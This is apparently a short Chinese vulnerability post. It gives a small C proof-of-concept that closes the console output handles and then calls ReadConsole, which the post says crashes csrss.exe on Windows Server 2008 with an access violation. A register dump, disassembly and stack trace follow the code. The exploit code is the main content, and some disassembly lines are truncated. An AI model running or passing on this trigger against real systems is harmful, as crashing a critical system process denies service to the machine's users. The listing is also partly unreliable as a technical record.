影响:

windows server 2008 r1

exploit:

int main(int argc, char *argv[])

{

DWORD foo;

char stuff[10];

CloseHandle(GetStdHandle(STD_OUTPUT_HANDLE ));

CloseHandle(GetStdHandle(STD_ERROR_HANDLE ));

ReadConsole(GetStdHandle( STD_INPUT_HANDLE ), stuff, 5, &foo, NULL);

}

原因C:\Windows\system32\csrss.exe访问冲突

地址756DB6A1 写入无效地址0000000C

eax=015c0da8 ebx=00000000 ecx=00000000 edx=015c14a8 esi=00000000 edi=015c0dc8

eip=756db6a1 esp=0083f5d0 ebp=0083f6a0 iopl=0 nv up ei pl zr

na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246

进程基目录表1F187040不匹配CR3 1F187360

001b:756db6a1 ff460c inc dword ptr

ds:0023:0000000c=????????

756db6a1 ff460c inc dword ptr

756db6a4 8b8d54ffffff mov ecx,dword ptr

756db6aa 898570ffffff mov dword ptr [ebp-90h],eax

756db6b0 8a8059010000 mov al,byte ptr

756db6b6 8845b3 mov byte ptr [ebp-4Dh],al

756db6b9 8a471c mov al,byte ptr

756db6bc 66834da4ff or word ptr [ebp-5Ch],0FFFFh

756db6c1 66834da6ff or word ptr [ebp-5Ah],0FFFFh

ChildEBP RetAddr Args to Child

0083f6a0 756dbd5e 015c0dc8 015c0da8 002a0058 winsrv!ReadChars+0x3c2

0083f6f8 757359e4 015c0da8 0083f80c 945f0621 winsrv!SrvReadConsole+0x102

0083f86c 76f77ca3 00000000 7781fc7b 00000000 CSRSRV!CsrApiRequestThread+0x3b1

0083f8ac 76f9e489 75735633 00000000 ffffffff ntdll!__RtlUserThreadStart+0x35

0083f8c4 00000000 75735633 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b

Comments
Write a Comment